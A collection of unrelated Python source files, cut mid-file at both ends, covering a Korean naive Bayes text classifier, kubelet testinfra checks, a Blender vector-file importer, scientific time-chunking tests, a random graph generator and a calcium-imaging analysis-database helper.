    # a) we enable `can_add_fields` so that type updates made in the current
    #    release are backward compatible with older release;
    # b) we enable `can_omit_fields` so that the current release is forward
    #    compatible with any type updates made by future release.
    type_id = put_type_handler(
        metadata_type, can_add_fields=True, can_omit_fields=True)
    logging.debug('Registering a metadata type with id %s.', type_id)
    # Re-read the stored type so the returned proto carries the id.
    metadata_type = get_type_handler(metadata_type.name)
    return metadata_type
  except mlmd.errors.AlreadyExistsError:
    # The put failed because the stored schema conflicts with ours even
    # with add/omit allowed; log both schemas and surface a RuntimeError.
    existing_type = get_type_handler(metadata_type.name)
    assert existing_type is not None, (
        'Not expected to get None when getting type %s.' % metadata_type.name)
    warning_str = (
        'Conflicting properties comparing with existing metadata type '
        'with the same type name. Existing type: '
        '%s, New type: %s') % (existing_type, metadata_type)
    logging.warning(warning_str)
    raise RuntimeError(warning_str)
| nilq/baby-python | python |
import math, sys
from konlpy.tag import Okt
class BayesianFilter:
    """Naive Bayes text classifier over Korean morphemes (KoNLPy Okt)."""

    def __init__(self):
        self.words = set()        # vocabulary of all morphemes seen
        self.word_dict = {}       # category -> {word -> count}
        self.category_dict = {}   # category -> number of fitted texts
        # Morphemes of the most recent predict() text; used by word_prob's
        # smoothing denominator. (Replaces the module-level `global gword`
        # of the original implementation.)
        self._last_words = []

    def fit(self, text, category):
        """Learn the morphemes of `text` as one example of `category`."""
        pos = self.split(text)
        for word in pos:
            self.inc_word(word, category)
        self.inc_category(category)

    def split(self, text):
        """Morphological analysis: return (token, tag) pairs, dropping
        particles (Josa), endings (Eomi) and punctuation.

        BUG FIX: the original removed items from the list while iterating
        it, which silently skipped the element after every removal.
        """
        twit = Okt()
        pos_list = twit.pos(text, norm=True, stem=True)
        return [word for word in pos_list
                if word[1] not in ("Josa", "Eomi", "Punctuation")]

    def inc_word(self, word, category):
        """Count one occurrence of `word` under `category`."""
        if category not in self.word_dict:
            self.word_dict[category] = {}
        if word not in self.word_dict[category]:
            self.word_dict[category][word] = 0
        self.word_dict[category][word] += 1
        self.words.add(word)

    def inc_category(self, category):
        """Count one fitted text for `category`."""
        if category not in self.category_dict:
            self.category_dict[category] = 0
        self.category_dict[category] += 1

    def predict(self, text):
        """Return (best_category, best_score) for a new text."""
        best_category = None
        self._last_words = self.split(text)
        max_score = -sys.maxsize
        for category in self.category_dict.keys():
            score = self.score(self._last_words, category)
            if score > max_score:
                max_score = score
                best_category = category
        return best_category, max_score

    def score(self, words, category):
        """Log-probability score of `words` under `category`."""
        score = math.log(self.category_prob(category))
        for word in words:
            score += math.log(self.word_prob(word, category))
        return score

    def category_prob(self, category):
        """P(category): fraction of fitted texts in this category."""
        sum_categories = sum(self.category_dict.values())
        category_v = self.category_dict[category]
        return category_v / sum_categories

    def word_prob(self, word, category):
        """Laplace-smoothed P(word | category).

        Denominator adds the length of the text last passed to predict()
        (empty before any prediction).
        """
        n = self.get_word_count(word, category) + 1
        d = sum(self.word_dict[category].values()) + len(self._last_words)
        return n / d

    def get_word_count(self, word, category):
        """Occurrences of `word` in `category` (0 if unseen)."""
        if word in self.word_dict[category]:
            return self.word_dict[category][word]
        return 0
| nilq/baby-python | python |
"""Role testing files using testinfra."""
def test_kubelet_package(host):
    """The kubelet package is installed and pinned to the 1.21 series."""
    pkg = host.package("kubelet")
    assert pkg.is_installed
    assert pkg.version.startswith("1.21")
def test_kubelet_service(host):
    """The kubelet service is running and enabled at boot."""
    svc = host.service("kubelet")
    assert svc.is_running
    assert svc.is_enabled
| nilq/baby-python | python |
'''entre no sistema com dois valores e saia com a soma entre eles'''
primeiro = int(input('Digite o primeiro valor: '))
segundo = int(input('Digite o segundo valor: '))
soma = primeiro + segundo
print(f'A soma de {primeiro} + {segundo} = {soma} ')
print('Acabou!')
| nilq/baby-python | python |
import tskit
import tszip
import matplotlib.pyplot as plt
import numpy as np

# Snakemake script: plot per-population node-age distributions from a
# tszip-compressed tree sequence. `snakemake` is injected by the runner.
site_ts = str(snakemake.input.site_ts)
plot_path = str(snakemake.output.plot)

ts = tszip.decompress(site_ts)
# One curve per population: node ages sorted ascending, log10-scaled
# (+1 keeps age-zero nodes finite).
for x in range(len(ts.populations())):
    y = ts.tables.nodes.time[np.where(ts.tables.nodes.population==x)[0]]
    plt.plot(np.log10(np.sort(y)+1), label=x)
plt.legend(title = 'population')
plt.ylabel('log10(node age+1)')
plt.xlabel('nodes within each population')
plt.savefig(plot_path)
| nilq/baby-python | python |
# import os
# import sys
# TEST_DIR = os.path.dirname(os.path.abspath(__file__))
# PROJECT_DIR = os.path.abspath(os.path.join(TEST_DIR, os.pardir, 'api'))
# sys.path.insert(0, PROJECT_DIR)
| nilq/baby-python | python |
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# <pep8 compliant>
bl_info = {
"name": "Adobe Illustrator / PDF / SVG",
"author": "Howard Trickey",
"version": (1, 3),
"blender": (2, 80, 0),
"location": "File > Import-Export > Vector files (.ai, .pdf, .svg)",
"description": "Import Adobe Illustrator, PDF, and SVG",
"warning": "",
"doc_url": "http://wiki.blender.org/index.php/Extensions:2.6/Py/"
"Scripts/Import-Export/AI_PDF_SVG",
"category": "Import-Export"}
if "bpy" in locals():
import imp
else:
from . import geom
from . import model
from . import vecfile
from . import import_vecfile
from . import offset
from . import pdf
from . import svg
from . import triquad
from . import art2polyarea
import math
import bpy
import bpy_extras.io_utils
from bpy.props import (BoolProperty,
EnumProperty,
FloatProperty,
IntProperty,
StringProperty
)
from bpy_extras.io_utils import ImportHelper
class VectorImporter(bpy.types.Operator, ImportHelper):
    """Load an AI or PDF or SVG file"""
    bl_idname = "import_vec.aipdfsvg"
    bl_label = "Import AI/PDF/SVG"
    bl_options = {"UNDO"}

    filter_glob : StringProperty(default="*.ai;*.pdf;*.svg", options={"HIDDEN"})
    smoothness : IntProperty(name="Smoothness",
        description="How closely to approximate curves",
        default=1,
        min=0,
        max=100)
    scale : FloatProperty(name="Scale",
        description="Scale longer bounding box side to this size",
        default=4.0,
        min=0.1,
        max=100.0,
        unit="LENGTH")
    subdiv_kind : EnumProperty(name="Subdivision Method",
        description="Method for approximating curves with lines",
        items=[ \
            ('UNIFORM', "Uniform",
                "All curves bisected 'smoothness' times"),
            ('ADAPTIVE', "Adaptive",
                "Curves subdivided until flat enough, as" \
                " determined by 'smoothness'"),
            ('EVEN', "Even",
                "Curves subdivided until segments have a common length," \
                " determined by 'smoothness'"),
            ],
        default='ADAPTIVE')
    filled_only : BoolProperty(name="Filled paths only",
        description="Only import filled paths",
        default=True)
    ignore_white : BoolProperty(name="Ignore white-filled",
        description="Do not import white-filled paths",
        default=True)
    combine_paths : BoolProperty(name="Combine paths",
        description="Use all paths when looking for holes",
        default=False)
    use_colors : BoolProperty(name="Use colors",
        description="Use colors from vector file as materials",
        default=False)
    extrude_depth : FloatProperty(name="Extrude depth",
        description="Depth of extrusion, if > 0",
        default=0.0,
        min=0.0,
        max=100.0,
        unit='LENGTH')
    bevel_amount : FloatProperty(name="Bevel amount",
        description="Amount of inward bevel, if > 0",
        default=0.0,
        min=0.0,
        max=1000.0,
        unit='LENGTH')
    bevel_pitch : FloatProperty(name="Bevel pitch",
        description="Angle of bevel from horizontal",
        default=45 * math.pi / 180.0,
        min=0.0,
        max=89.0 * math.pi / 180.0,
        unit='ROTATION')
    cap_back : BoolProperty(name="Cap back",
        description="Cap the back if extruding",
        default=False)
    true_scale : BoolProperty(name="True Scale",
        description="Use true scale, with 1 meter = 1 blender unit",
        default=False)
    # some info display properties
    num_verts : IntProperty(name="Number of vertices",
        default=0)
    num_faces : IntProperty(name="Number of faces",
        default=0)

    def draw(self, context):
        """Draw the import options panel in the file browser sidebar."""
        layout = self.layout
        box = layout.box()
        box.label(text="Import Options")
        box.prop(self, "smoothness")
        box.prop(self, "scale")
        box.prop(self, "true_scale")
        box.prop(self, "subdiv_kind")
        box.prop(self, "filled_only")
        box.prop(self, "ignore_white")
        box.prop(self, "combine_paths")
        box.prop(self, "use_colors")
        box.prop(self, "extrude_depth")
        box.prop(self, "bevel_amount")
        box.prop(self, "bevel_pitch")
        box.prop(self, "cap_back")
        # After a successful import, show vertex/face counts (set by action()).
        if self.num_verts > 0:
            layout.label(text="Ve:" + str(self.num_verts) + \
                " | Fa:" + str(self.num_faces))

    def action(self, context):
        """Read the selected vector file, convert it to a mesh and link the
        new object into the scene collection. (Return value is unused;
        execute() always reports FINISHED.)"""
        #convert the filename to an object name
        if not self.filepath:
            return
        objname = self.filepath.split("\\")[-1].split("/")[-1]
        if objname.find(".") > 0:
            objname = objname.split(".")[0]
        options = import_vecfile.ImportOptions()
        if self.true_scale:
            # 0.0 disables bounding-box rescaling; real units applied below.
            options.scaled_side_target = 0.0
        else:
            options.scaled_side_target = self.scale
        options.quadrangulate = True
        options.extrude_depth = self.extrude_depth
        options.bevel_amount = self.bevel_amount
        options.bevel_pitch = self.bevel_pitch
        options.cap_back = self.cap_back
        options.convert_options.subdiv_kind = self.subdiv_kind
        options.convert_options.smoothness = self.smoothness
        options.convert_options.filled_only = self.filled_only
        options.convert_options.ignore_white = self.ignore_white
        options.convert_options.combine_paths = self.combine_paths
        (mdl, msg) = import_vecfile.ReadVecFileToModel(self.filepath, options)
        if msg:
            self.report({'ERROR'},
                "Problem reading file " + self.filepath + ": " + msg)
            return {'FINISHED'}
        verts = mdl.points.pos
        if self.true_scale:
            # assume model units are 90 dpi, if svg file
            # else 72 dpi
            # convert to meters (1 inch = 0.0254 meters)
            if self.filepath[-4:] in (".svg", ".SVG"):
                s = 0.0254 / 90.0
                print("svg s=", s)
            else:
                s = 0.0254 / 72.0
            verts = [(s * v[0], s * v[1], s * v[2]) for v in verts]
        # Only triangles and quads are kept for the Blender face list.
        faces = [f for f in mdl.faces if 3 <= len(f) <= 4]
        mesh = bpy.data.meshes.new(objname)
        mesh.from_pydata(verts, [], faces)
        if self.use_colors:
            add_colors(mesh, mdl.face_data)
        mesh.update()
        self.num_verts = len(verts)
        self.num_faces = len(faces)
        obj = bpy.data.objects.new(objname, mesh)
        context.scene.collection.objects.link(obj)
        # Make the new object the sole selection and the active object.
        bpy.ops.object.select_all(action='DESELECT')
        obj.select_set(True)
        context.view_layer.objects.active = obj

    def execute(self, context):
        """Blender operator entry point."""
        self.action(context)
        return {'FINISHED'}
def add_colors(mesh, colors):
    """Assign per-face materials to `mesh` from a parallel list of colors.

    `colors` is assumed parallel to `mesh.polygons`; if it is too short,
    nothing is done. Identical colors share a single material.
    """
    if len(colors) < len(mesh.polygons):
        return
    # use rgbtoindex to keep track of colors already
    # seen and map them to indices into mesh.materials
    rgbtoindex = {}
    matnameprefix = "VImat." + mesh.name + "."
    # (Removed a leftover per-face debug print from the loop.)
    for i, c in enumerate(colors):
        if c not in rgbtoindex:
            matname = matnameprefix + str(len(bpy.data.materials))
            mat = bpy.data.materials.new(matname)
            # NOTE(review): Blender 2.80 expects RGBA here -- confirm c
            # carries 4 components.
            mat.diffuse_color = c
            mesh.materials.append(mat)
            cindex = len(mesh.materials) - 1
            rgbtoindex[c] = cindex
        else:
            cindex = rgbtoindex[c]
        mesh.polygons[i].material_index = cindex
def menu_import(self, context):
    # Menu entry appended to File > Import for this addon.
    self.layout.operator(VectorImporter.bl_idname,
        text="Vector files (.ai, .pdf, .svg)")
def register():
    """Register the operator and add it to the File > Import menu."""
    bpy.utils.register_class(VectorImporter)
    bpy.types.TOPBAR_MT_file_import.append(menu_import)
def unregister():
    """Remove the menu entry and unregister the operator."""
    bpy.utils.unregister_class(VectorImporter)
    bpy.types.TOPBAR_MT_file_import.remove(menu_import)
# Allow (re-)registering when the file is run directly, e.g. from
# Blender's text editor.
if __name__ == "__main__":
    register()
| nilq/baby-python | python |
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
import unittest as ut
import os.path
import stripeline.timetools as tt
import numpy as np
class TestTimeTools(ut.TestCase):
    # Unit tests for stripeline.timetools.split_time_range.

    def testSplitTimeRangeSimple(self):
        '''Test split_time_range against a very simple input'''
        result = tt.split_time_range(
            time_length=2.0, num_of_chunks=2, sampfreq=2.0, time0=0.5)

        self.assertEqual(len(result), 2)
        self.assertEqual(result[0], tt.TimeChunk(
            start_time=0.5, num_of_samples=2))
        self.assertEqual(result[1], tt.TimeChunk(
            start_time=1.5, num_of_samples=2))

    def testSplitTimeRangeComplex(self):
        '''Test split_time_range against a tricky input'''
        # Expected start times (2, 5, 7, 10) are not evenly spaced.
        result = tt.split_time_range(
            time_length=10.0, num_of_chunks=4, sampfreq=1.0, time0=2.0)

        self.assertEqual(len(result), 4)
        self.assertEqual(result[0], tt.TimeChunk(
            start_time=2.0, num_of_samples=2))
        self.assertEqual(result[1], tt.TimeChunk(
            start_time=5.0, num_of_samples=2))
        self.assertEqual(result[2], tt.TimeChunk(
            start_time=7.0, num_of_samples=2))
        self.assertEqual(result[3], tt.TimeChunk(
            start_time=10.0, num_of_samples=2))
class TestToiProviders(ut.TestCase):
    'Test classes like ToiProvider and FitsToiProvider'

    def test_split(self):
        'Verify that "split_into_n" returns the expected results.'
        self.assertEqual(tuple(tt.split_into_n(10, 4)), (2, 3, 2, 3))
        self.assertEqual(tuple(tt.split_into_n(201, 2)), (100, 101))

    def test_toi_splitting(self):
        'Verify that "assign_toi_files_to_processes" returns the expected results.'
        samples_per_processes = [110, 90]
        fits_files = [tt.ToiFile(file_name='A.fits', num_of_samples=40),
                      tt.ToiFile(file_name='B.fits', num_of_samples=60),
                      tt.ToiFile(file_name='C.fits', num_of_samples=30),
                      tt.ToiFile(file_name='D.fits', num_of_samples=70)]
        result = tt.assign_toi_files_to_processes(
            samples_per_processes, fits_files)
        self.assertEqual(len(result), 2)
        self.assertEqual(len(result[0]), 3)
        self.assertEqual(len(result[1]), 2)

        segment0, segment1 = tuple(result)
        # Process 0: all of A (40) and B (60), plus the first 10 of C = 110.
        self.assertEqual(segment0[0],
                         tt.ToiFileSegment(file_name='A.fits',
                                           first_element=0,
                                           num_of_elements=40))
        self.assertEqual(segment0[1],
                         tt.ToiFileSegment(file_name='B.fits',
                                           first_element=0,
                                           num_of_elements=60))
        self.assertEqual(segment0[2],
                         tt.ToiFileSegment(file_name='C.fits',
                                           first_element=0,
                                           num_of_elements=10))
        # Process 1: the remaining 20 of C plus all of D (70) = 90.
        self.assertEqual(segment1[0],
                         tt.ToiFileSegment(file_name='C.fits',
                                           first_element=10,
                                           num_of_elements=20))
        self.assertEqual(segment1[1],
                         tt.ToiFileSegment(file_name='D.fits',
                                           first_element=0,
                                           num_of_elements=70))

    def test_fits_tois(self):
        'Verify that FitsToiProvider is able to load some real data from FITS files'
        test_file_path = os.path.dirname(__file__)
        file_names = [os.path.join(test_file_path, x) for x in ['toi_test_A.fits',
                                                                'toi_test_B.fits',
                                                                'toi_test_C.fits']]
        file_layout = \
            tt.FitsTableLayout(time_col=tt.FitsColumn(hdu=1, column='TIME'),
                               theta_col=tt.FitsColumn(hdu=2, column=0),
                               phi_col=tt.FitsColumn(hdu=2, column=1),
                               psi_col=tt.FitsColumn(hdu=2, column=2),
                               signal_cols=[
                                   tt.FitsColumn(hdu=3, column='DET_Q1'),
                                   tt.FitsColumn(hdu=3, column='DET_Q2'),
                                   tt.FitsColumn(hdu=3, column='DET_U1'),
                                   tt.FitsColumn(hdu=3, column='DET_U2')
                               ])

        # Create a set of FitsToiProviders, one for each MPI rank. Note that we do
        # *not* really use MPI here (comm is None): we just want to check that
        # the segment is loaded correctly for each rank
        num_of_processes = 2
        providers = [tt.FitsToiProvider(rank=i,
                                        num_of_processes=num_of_processes,
                                        file_names=file_names,
                                        file_layout=file_layout,
                                        comm=None)
                     for i in range(num_of_processes)]

        # Check that get_time works
        self.assertTrue(np.allclose(
            providers[0].get_time(), np.array([1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0])))
        self.assertTrue(np.allclose(
            providers[1].get_time(), np.array([8.0, 9.0, 10.0, 11.0, 12.0, 13.0, 14.0, 15.0])))

        # Check that get_pointings work
        theta0, phi0 = providers[0].get_pointings()
        theta1, phi1 = providers[1].get_pointings()
        self.assertTrue(np.allclose(
            theta0, np.array([0.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6])))
        self.assertTrue(np.allclose(
            theta1, np.array([0.5, 0.4, 0.3, 0.0, 0.1, 0.2, 0.3, 0.4])))
        self.assertTrue(np.allclose(
            phi0, np.array([0.0, 0.01, 0.02, 0.03, 0.04, 0.05, 0.0])))
        self.assertTrue(np.allclose(
            phi1, np.array([0.2, 0.4, 0.6, 0.0, 0.01, 0.02, 0.03, 0.04])))

        # Check that get_signal works, both when passing an integer and a string
        sig_from_idx = providers[0].get_signal(0)
        sig_from_name = providers[0].get_signal('Q1')
        self.assertTrue(np.allclose(sig_from_idx, sig_from_name))
        self.assertTrue(np.allclose(
            sig_from_idx, np.array([0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9])))
| nilq/baby-python | python |
#!/usr/bin/env pypy
# Random connected weighted graph generator (Python 2 print syntax).
# Usage: script.py N M  -> prints "N M" then M lines "u v w".
import sys
from random import *

if len(sys.argv) < 3:
    print "Usage: ", sys.argv[0], " [N] [M]"
    exit(-1)

n = int(sys.argv[1])
m = int(sys.argv[2])
CMAX = 100  # maximum edge weight

print n, m
assert m >= n - 1  # need at least a spanning tree's worth of edges
# First n-1 edges: each vertex v links to a random earlier vertex,
# forming a random tree and guaranteeing connectivity.
for v in range(2, n + 1):
    u = randrange(1, v)
    w = randint(1, CMAX)
    print u, v, w
# Remaining m-(n-1) edges are uniform random (duplicates and
# self-loops are possible).
for i in range(0, m - n + 1):
    u = randint(1, n)
    v = randint(1, n)
    w = randint(1, CMAX)
    print u, v, w
| nilq/baby-python | python |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 23 15:24:53 2019
@author: melisa
"""
import pandas as pd
import logging
import server as connect
import math
# Paths
analysis_states_database_path = 'references/analysis/analysis_states_database.xlsx'
backup_path = 'references/analysis/backup/'
parameters_path = 'references/analysis/parameters_database.xlsx'
## GENERAL AUXILIARY FUNCIONS
def get_query_from_dict(dictionary):
    """Build a pandas-style query string from a dict, ANDing together one
    ``key == value`` clause per entry (warning on None values, which are
    not allowed but are still included)."""
    for key in dictionary:
        if dictionary[key] == None:
            logging.warning('There is a None in the dictionary. None s are not allowed!')
    return ' & '.join(f'{key} == {dictionary[key]}' for key in dictionary)
## this class only creates a structure where related to the way the data base is structured.
## It has a method related to the value of the step in interest.
class data_structure():
    """Layout of the analysis states database: the ordered pipeline steps,
    the multi-index levels, the expected columns, plus helpers to open the
    database and to look up a step's index."""

    def __init__(self):
        # Define the steps in the pipeline (in order)
        self.steps = [
            'decoding',
            'cropping',  # spatial borders that are unusable (due to microenscope border
            # or blood clot) are removed
            'motion_correction',  # individual trial movies (5 min) are rigidly or
            # piecewise rigidly motion corrected
            'alignment',  # Multiple videos (e.g. all trials of a session, 210 min) are
            # rigid motion corrected to each other, resulting in a long aligned video
            'source_extraction',  # neural activity is deconvolved from the videos
            # trial-wise or session-wise
            'component_evaluation'
        ]
        # Multi Index Structure
        self.data = ['mouse', 'session', 'trial', 'is_rest']
        # BUG FIX: the comprehensions below used the undefined bare name
        # `steps` (NameError at construction time); must be `self.steps`.
        self.analysis = [f'{step}_v' for step in self.steps]
        self.data_analysis = self.data + self.analysis
        # Columns
        self.columns = self.data + ['experiment_parameters',
                                    'experiment_comments',
                                    'raw_output',
                                    'raw_comments']
        # for each step, add a 'v' (version), 'parameters', 'output' and 'comments' columns
        for step in self.steps:
            self.columns += [f'{step}_{idx}' for idx in ['v', 'parameters', 'output', 'comments']]
        self.columns += ['analyzed_Sebastian']  # whether or not Sebastian has analyzed the data fully

    def open_database(self, path=None):
        '''
        This function reads the analysis states database (.xlsx file) using the correct
        settings as a multi-index dataframe.

        `path` defaults to the module-level analysis_states_database_path
        (resolved lazily, at call time).
        '''
        if path is None:
            path = analysis_states_database_path
        if os.getlogin() == 'sebastian':
            logging.info('Downloading analysis states database...')
            ssh = connect.get_SSH_connection()
            sftp = ssh.open_sftp()
            sftp.get(os.environ['PROJECT_DIR_SERVER'] + path, os.environ['PROJECT_DIR_LOCAL'] + path)
            sftp.close()
            ssh.close()
            logging.info('Downloaded analysis states database')
        return pd.read_excel(path, dtype = {'date' : 'str', 'time' : 'str'}).set_index(self.data_analysis)

    def get_step_index(self, step):
        '''
        This function returns the step index (int) given a step name (str),
        or None (after logging an error) for an unknown name.
        '''
        try:
            # BUG FIX: was `steps.index(step)` (undefined bare name).
            return self.steps.index(step)
        except ValueError:  # narrowed from a bare except
            logging.error(f'Not a valid step. Valid values are: {self.steps}')
            return
class data_configuration():
def __init__(self, mouse = None, session = None, trial = None, is_rest = None,
decoding_v = None, cropping_v = None,
motion_correction_v = None, alignment_v = None,
source_extraction_v = None,component_evaluation_v=None):
self.mouse=mouse
self.session=session
self.trial=trial
self.is_rest=is_rest
self.decoding = decoding_v
self.cropping = cropping_v
self.motion_correction = motion_correction_v
self.alignment = alignment_v
self.sourse_extraction = source_extraction_v
self.component_evaluation = component_evaluation_v
self.data_structure=data_structure()
def index_assignation(self):
index=(self.mouse,self.session,self.trial,self.is_rest,self.decoding,
self.cropping, self.motion_correction, self.alignment,
self.sourse_extraction, self.component_evaluation)
return index
def value_assignation(self):
assignation = {self.data_structure.data[0]:self.mouse, self.data_structure.data[1]:self.session, self.data_structure.data[2]:self.trial,
self.data_structure.data[3]:self.is_rest }
return assignation
def version_assignation(self):
assignation = {self.data_structure.analysis[0]:self.decoding, self.data_structure.analysis[1]:self.cropping, self.data_structure.analysis[2]:self.motion_correction,
self.data_structure.analysis[3]:self.alignment,self.data_structure.analysis[4]:self.sourse_extraction,self.data_structure.analysis[5]:self.component_evaluation}
return assignation
def get_parameters(self, step, path = parameters_path, download_= True):
'''
This function gets the parameters set for a certain trial (specified by mouse,
session, trial, is_rest) by the parameters database.
Args:
step: str
The step to which the parameters belong
download_: bool
Whether or not to download the parameters database from the server
before reading the local copy.
Returns:
params: dict
A dictionary containing the parameters.
'''
if os.getlogin() == 'sebastian' and download_:
logging.debug('Downloading parameters...')
ssh = connect.get_SSH_connection()
sftp = ssh.open_sftp()
sftp.get(os.environ['PROJECT_DIR_SERVER'] + path, os.environ['PROJECT_DIR_LOCAL'] + path)
sftp.close()
ssh.close()
step_index = self.data_structure.get_step_index(step)
df = pd.read_excel(path, sheet_name = step_index)
# Determine the parameters
param_names = [p for p in df.columns.tolist() if p not in (['type', 'comment'] + self.data_structure.data)]
# Store the default parameters
params = dict(df.query('type == "default"').iloc[0][param_names])
dtypes = dict(df.query('type == "dtype"').iloc[0][param_names])
# logging.debug(f'The following default parameters were found: {params}')
# Look for parameters specific to that mouse, session or trial
criteria = [self.mouse, self.session, self.trial, self.is_rest]
for i, criterium in enumerate(criteria):
if criterium != None:
query_dict = {self.data_structure.data[j] : criteria[j] for j in range(0, i + 1)}
query = get_query_from_dict(query_dict)
# logging.debug(f'Looking for specific parameters to {data_structure[i]} using query: \n {query}')
selected_rows = df.query(query)
selected_rows = selected_rows[selected_rows.isnull()[self.data_structure.data[i + 1:]].T.all().T]
if not selected_rows.empty:
# If specific parameters are found, apply them
# logging.debug(f'Found parameters specific to {data_structure[i]}: \n {selected_rows}')
params_update = dict(selected_rows.iloc[0][param_names])
# logging.debug(f'params_update: {params_update}')
new_update = {}
for key in params_update:
if type(params_update[key]) == str or not math.isnan(params_update[key]):
new_update[key] = params_update[key]
if len(new_update) != 0:
params.update(new_update)
# logging.debug(f'params after update: {params}')
# Evaluate the parameters (e.g. turn 'True' into True)
for key in param_names:
# if not eval(dtypes[key]) == type(params[key]):
# params[key] = eval(dtypes[key] + f'({params[key]})')
#
if dtypes[key] == 'boolean':
params[key] = bool(params[key])
elif dtypes[key] == 'str':
params[key] = str(params[key])
else:
try:
params[key] = eval(params[key])
except:
pass
return params
def set_parameters(self, step, setting_params, path = parameters_path, path_backup = backup_path , check = True, upload_ = True):
    '''
    Set the parameters for a certain trial (specified by mouse, session,
    trial, is_rest) in the parameters database, or set the defaults when
    no mouse is specified.
    Args:
        step: str
            The step to which the parameters belong
        setting_params: dict
            Parameter name -> value pairs to write into the database
        path: str
            Path of the local parameters database (Excel workbook)
        path_backup: str
            Location used for the daily backup
        check: bool
            Whether or not to ask for a final confirmation in the console
        upload_: bool
            Whether or not to upload the parameters database to the server
            after writing to the local copy.
    '''
    import collections.abc  # ensure the abc submodule is loaded
    # BUG FIX: the original body referenced the undefined names `params`
    # and `mouse`; use the `setting_params` argument and `self.mouse`.
    params = setting_params
    query_dict = self.value_assignation()
    # Load every sheet so the whole workbook can be rewritten afterwards
    read = pd.ExcelFile(path)
    df_dict = {}
    for sheet_name in read.sheet_names:
        df_dict[sheet_name] = pd.read_excel(path, sheet_name = sheet_name)
    df = df_dict[step]
    read.close()
    if self.mouse is not None:
        if check:
            print(f'Set the following parameters for {query_dict}? \n {params}')
            cont = ''
            while cont != 'yes' and cont != 'no':
                print("Type 'yes' or 'no'")
                cont = input()
            if cont == 'no':
                print('Cancelling')
                return
        print(f'Setting parameters for {query_dict} \n {params}')
        # Check if there already is a row with these criteria
        query = get_query_from_dict(query_dict)
        selected_rows = df.query(query)
        if not selected_rows.empty:
            # Update the matching row(s) in place
            for idx, row in selected_rows.iterrows():
                for key in params:
                    # Sequences (lists, tuples, ...) are stored as their repr string
                    # (collections.Sequence was removed in Python 3.10 -> use collections.abc)
                    df.loc[idx, key] = str(params[key]) if isinstance(params[key], collections.abc.Sequence) else params[key]
        else:
            # No row yet for these criteria: append a new one
            params.update(query_dict)
            # DataFrame.append was removed in pandas 2.0; pd.concat is the replacement
            df = pd.concat([df, pd.DataFrame([params])], ignore_index = True)
        print(f'Set parameters for {query_dict} \n {params}')
    else:
        if check:
            print(f'Set the following parameters as default? \n {params}')
            cont = ''
            while cont != 'yes' and cont != 'no':
                print("Type 'yes' or 'no'")
                cont = input()
            if cont == 'no':
                print('Cancelling')
                return
        print(f'Setting parameters as default: \n {params}')
        # Defaults live in the row(s) tagged type == "default"
        selected_rows = df.query('type == "default"')
        for idx, row in selected_rows.iterrows():
            for key in params:
                df.loc[idx, key] = str(params[key]) if isinstance(params[key], collections.abc.Sequence) else params[key]
    df_dict[step] = df
    # Rewrite the full workbook (all sheets) with the updated step sheet
    with pd.ExcelWriter(path) as writer:
        for key in df_dict:
            df_dict[key].to_excel(writer, sheet_name=key, index = False)
    # Make a backup every day
    make_backup(path, path_backup)
    # NOTE(review): eval() of an environment variable; value is expected to
    # be the literal 'True' or 'False' — confirm before hardening.
    if eval(os.environ['LOCAL']) and upload_:
        connect.upload(path)
def select(self, step):
    '''
    Select certain analysis states (specified by mouse, session, trial,
    is_rest, decoding_v, cropping_v, etc.) to be used in a certain step.
    If no analysis version is specified, it selects the latest one.
    It makes sure there is only one analysis state per trial.
    This function is quite specialized. Refer to the pandas dataframe.query()
    method for more general selection of analysis states.
    Args:
        step: str
            Determines for which step the states are selected
    Returns:
        pd.DataFrame of selected rows (possibly empty), or None when `step`
        is not a valid step.
    '''
    # Get the step index
    step_index = self.data_structure.get_step_index(step)
    if not type(step_index) == int:
        # If it is not a valid step, return
        return
    # Open the analysis states dataframe
    states_df = self.data_structure.open_database()
    # Select the specified data
    query = get_query_from_dict(self.value_assignation())
    if query != '':
        logging.debug('Selecting rows corresponding to specified data')
        logging.debug('query: ' + query)
        selected_rows = states_df.query(query)
        logging.debug(f'{len(selected_rows)} rows found')
    else:
        selected_rows = states_df
    # BUG FIX: the original referenced the undefined name `steps` and always
    # formatted the *current* step into the query (yielding the contradictory
    # 'step_v != 0 and step_v == 0'); use the data structure's step list and
    # the loop variable instead.
    query_list = []
    for ii in self.data_structure.steps[:step_index]:  # steps before the current one must be done
        if ii != 'alignment':  # alignment is optional and may legitimately be 0
            query_list.append(f'{ii}_v != 0')
    for ii in self.data_structure.steps[step_index:]:  # current and later steps must not be done yet
        query_list.append(f'{ii}_v == 0')
    query = ' and '.join(query_list)
    logging.debug(f'Selecting rows with a non-zero input analysis version. Query: \n {query}')
    selected_rows = selected_rows.query(query)
    logging.debug(f'{len(selected_rows)} rows found')
    # Select the specified analysis version
    # NOTE(review): in the original code this query was computed but never
    # applied to selected_rows; preserved as-is pending confirmation.
    query = self.version_assignation()
    # Make sure there is only one row per trial
    logging.debug('Making sure there is only one row per trial.')
    for trial_index, trial_frame in selected_rows.groupby(level = self.data_structure.data):
        # Determine the latest input step version per trial
        sorted_frame = trial_frame.sort_values(self.data_structure.analysis).reset_index()
        best_row = sorted_frame.loc[len(sorted_frame) - 1]
        best_row_analysis_index = tuple((best_row.loc[j] for j in self.data_structure.analysis))
        best_row_index = trial_index + best_row_analysis_index
        # Now drop all other rows of that trial
        for row_index, row in trial_frame.iterrows():
            if row_index != best_row_index:
                selected_rows = selected_rows.drop(row_index)
    logging.debug(f'{len(selected_rows)} rows found')
    # If no trials were found.
    if selected_rows.empty:
        logging.warning('No rows were found for the specified parameters.')
    return selected_rows
def create_file_name(self, step):
    '''
    Return the canonical basename used for files of this analysis state,
    e.g. "mouse_56166_session_2_trial_1_R_v1.3.1": the trial part carries an
